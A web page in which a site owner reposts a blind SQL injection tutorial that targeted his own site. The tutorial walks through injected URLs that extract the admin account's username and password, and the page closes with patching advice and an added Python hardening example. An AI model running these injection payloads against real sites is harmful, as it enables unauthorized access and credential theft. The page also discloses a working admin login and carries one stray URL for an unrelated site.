(You can search for Google, www.jinshouzhi.org is available)
This article was published in October of last year; I only found it this year. Ever since, my website shbbs.net has been treated as the tutorial's target and hit, heh, heh, dizzying. It was only when a kind netizen reminded me that I did some patching. Don't attack my website directly by following the tutorial, heh, heh, I have already patched it :) Go to the exercise of others.
:) The article follows below; there is also an animated tutorial, heh :)
SQL Injection in Practice
Target: the www.shbbs.net article publishing system ~~
Purpose: to demonstrate SQL injection to novices; please don't destroy anything ~~
Open http://www.shbbs.net/Article/List.asp?id=974
Append a ' to http://www.shbbs.net/article/list.asp?id=974
http://www.shbbs.net/Article/List.asp?id=974' returns an error! The id is not filtered.
Great. The steps now are:
1. Guess the table that holds the administrator account.
2. Guess the field name of the user and the field name of the password in that table.
3. Guess the length of the user name and the length of the password.
4. Guess the user name and the password.
5. Find the management interface and log in.
Guess the administrator table:
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin)
// min(id) returns the smallest id value in the table. If the article is returned, that proves there is an admin table. If an error is returned instead, there is no table named admin.
Guess the user's field name:
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where user='qqq')
Returns an error message, indicating that there is no field named user.
Try again ~~
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where username='qqq')
No error message is returned, and no article is returned either; the page reports that the corresponding article cannot be found. This proves that admin has a field named username; the username is just not qqq.
Guess the password's field name:
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where passwd='qqq')
Returns an error message, indicating that there is no field named passwd.
Try again ~~
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where password='qqq')
No error message is returned, and no article is returned either; the corresponding article is not found. This proves that admin has a field named password; the password is just not qqq.
Now guess the length of the user name:
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where len(username)>8)
Correct ~~
http://www.xuanke.com/wz/list.asp?id=47 and 1=(select min(id) from admin where len(username)<15)
Correct ~~ The user name length is greater than 8 and less than 15.
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where len(username)=10)
Ha ha ~~ The user name length is 10 ~~
Guess the password length:
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where len(password)>8)
Correct ~~
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where len(password)<15)
Correct ~~ The password length is also greater than 8 and less than 15.
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where len(password)=10)
Ha ha ~~ The password length is 10.
User name length: 10. Password length: 10.
Now guess the user name:
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where mid(username,1,1)='a')
Wrong ~~
Guess again ~~
http://www.shbbs.net/article/list.asp?id=974 and 1=(select min(id) from admin where mid(username,1,1)='s')
Heh ~~ Correct ~~ The first character of the user name is s.
Guess the second character of the user name ~~
http://www.shbbs.net/Article/List.asp?id=974 and 1=(select min(id) from admin where mid(username,2,1)='h')
The second character of the user name is h.
To save time: I have already guessed it. User name: shbbsadmin
Now let's guess the password ~~ Guessing the password works the same way as guessing the user name ~~
http://www.shbbs.net/article/list.asp?id=974 and 1=(select min(id) from admin where mid(password,1,1)='s')
Guess, guess ~
To save time: I have already guessed it, heh, heh ~~ Password: shbbsadmin. Ha ha ~~ The same as the user name ~~
User: shbbsadmin Password: shbbsadmin
====================
Oh, I was using a downloaded network article system, and an SQL injection attacker wrote a tutorial that took my site as its example. Fortunately, the user names and passwords of my forum and my article publishing system are different; otherwise the loss could have been miserable.
So cultivate the habit of paying attention to security when writing code.
If id and other numeric parameters are passed through CInt() for type conversion, the injection will absolutely fail. Character-type parameters are nothing to be afraid of either: the injected text will be treated as part of the string and has no effect.
Alternatively, limit the length of the incoming parameters; for example, If Len(Request("id")) > 5 Then Response.End is one simple statement that gets in the injection attacker's way.
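The advice above, as an added example that is not code from the original article or from the site's article system: Python with an in-memory SQLite database stands in for the ASP page, `parse_id` is a hypothetical counterpart of the CInt() conversion plus the length limit, and the bound parameters go one step beyond the article's advice. The tables, rows and function names are constructed for illustration; the probe string is the one quoted in the article.

```python
import sqlite3

# Probe quoted in the article (appended to id=974).
PROBE = "974 and 1=(select min(id) from admin)"

def make_db():
    # Constructed sample data; table and column names follow the article.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO article VALUES (974, 'sample article');
        INSERT INTO admin VALUES (1, 'example_user', 'example_pass');
    """)
    return db

def list_vulnerable(db, raw_id):
    # The unfiltered pattern: the raw query-string value is spliced into the
    # SQL text, so "article returned" vs "error" answers the probe's question.
    return db.execute("SELECT title FROM article WHERE id=" + raw_id).fetchall()

def parse_id(raw_id, max_digits=5):
    # Hypothetical analogue of CInt() plus the length limit:
    # accept only 1..max_digits ASCII digits, reject everything else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= max_digits):
        raise ValueError("id must be a short decimal integer")
    return int(raw_id)

def list_hardened(db, raw_id):
    # Validate first, then bind the value so it can never become SQL syntax.
    sql = "SELECT title FROM article WHERE id=?"
    return db.execute(sql, (parse_id(raw_id),)).fetchall()

def find_admin_by_name(db, name):
    # Character-type parameter: bound as data, so a quote inside it is inert.
    return db.execute("SELECT id FROM admin WHERE username=?", (name,)).fetchall()

def demo():
    db = make_db()
    results = {"vulnerable": list_vulnerable(db, PROBE)}  # condition is evaluated
    try:
        list_hardened(db, PROBE)
    except ValueError as exc:
        results["hardened"] = str(exc)                    # same reply for any probe
    results["string"] = find_admin_by_name(db, "qqq'")    # no error, no match
    return results

if __name__ == "__main__":
    print(demo())
```

The hardened handler gives the same rejection whether or not the guessed table or field exists, which removes the error/no-error signal the tutorial relies on.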